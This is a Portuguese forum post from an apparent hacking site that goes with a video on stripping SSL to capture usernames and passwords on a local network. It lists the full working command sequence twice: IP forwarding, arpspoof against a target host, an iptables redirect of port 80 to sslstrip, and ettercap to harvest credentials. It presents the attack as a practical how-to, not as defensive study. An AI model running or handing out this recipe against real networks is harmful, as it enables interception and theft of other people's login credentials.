Nesta video vou mostrar como a criptografia SSL não e seguro. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafico da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).
Programas usados:
Comando usados:
OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0"
Todas os programas são encontrados no backtrack 4
Download da video:
Senha: guiadohacker.com.br
Assista on-line:
Musicas da vídeo recomendada pelo DavidFelipe
Link reupado por v7cyber
Programas usados:
- Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
- Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
- Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comando usados:
kate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0
sslstrip -a -k -f
ettercap -T -q -i eth0
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.1.1.6 10.1.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0
sslstrip -a -k -f
ettercap -T -q -i eth0
Todas os programas são encontrados no backtrack 4
Download da video:
[U]Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Senha: guiadohacker.com.br
Assista on-line:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Link reupado por v7cyber
Comment